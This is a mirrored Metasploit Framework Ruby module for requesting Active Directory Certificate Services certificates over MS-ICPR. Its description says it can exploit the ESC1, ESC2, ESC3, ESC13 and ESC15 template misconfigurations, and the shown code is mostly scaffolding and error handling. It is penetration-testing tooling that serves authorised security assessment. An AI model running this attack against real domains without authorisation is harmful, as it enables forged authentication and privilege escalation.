Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/dcerpc/icpr_cert.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'ruby_smb/dcerpc/client'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::MsIcpr

10
  include Msf::Exploit::Remote::SMB::Client::Authenticated

11
  include Msf::Exploit::Remote::DCERPC

12
  include Msf::Auxiliary::Report

13
  include Msf::OptionalSession::SMB

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'ICPR Certificate Management',

20
        'Description' => %q{

21
          Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate

22
          template's configuration the resulting certificate can be used for various operations such as authentication.

23
          PFX certificate files that are saved are encrypted with a blank password.

24


25
          This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Will Schroeder', # original idea/research

30
          'Lee Christensen', # original idea/research

31
          'Oliver Lyak', # certipy implementation

32
          'Spencer McIntyre'

33
        ],

34
        'References' => [

35
          [ 'URL', 'https://posts.specterops.io/certified-pre-owned-d95910965cd2' ],

36
          [ 'URL', 'https://github.com/GhostPack/Certify' ],

37
          [ 'URL', 'https://github.com/ly4k/Certipy' ]

38
        ],

39
        'Notes' => {

40
          'Reliability' => [],

41
          'Stability' => [],

42
          'SideEffects' => [ IOC_IN_LOGS ],

43
          'AKA' => [ 'Certifry', 'Certipy' ]

44
        },

45
        'Actions' => [

46
          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]

47
        ],

48
        'DefaultAction' => 'REQUEST_CERT'

49
      )

50
    )

51
  end

52


53
  def run

54
    send("action_#{action.name.downcase}")

55
  rescue MsIcprConnectionError, SmbIpcConnectionError => e

56
    fail_with(Failure::Unreachable, e.message)

57
  rescue MsIcprAuthenticationError, MsIcprAuthorizationError, SmbIpcAuthenticationError => e

58
    fail_with(Failure::NoAccess, e.message)

59
  rescue MsIcprNotFoundError => e

60
    fail_with(Failure::NotFound, e.message)

61
  rescue MsIcprUnexpectedReplyError => e

62
    fail_with(Failure::UnexpectedReply, e.message)

63
  rescue MsIcprUnknownError => e

64
    fail_with(Failure::Unknown, e.message)

65
  end

66


67
  def action_request_cert

68
    with_ipc_tree do |opts|

69
      request_certificate(opts)

70
    end

71
  end

72


73
  # @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.

74
  # @return [void]

75
  def with_ipc_tree

76
    opts = {}

77
    if session

78
      print_status("Using existing session #{session.sid}")

79
      self.simple = session.simple_client

80
      opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")

81
    end

82


83
    yield opts

84
  ensure

85
    opts[:tree].disconnect! if opts[:tree]

86
  end

87
end

88


89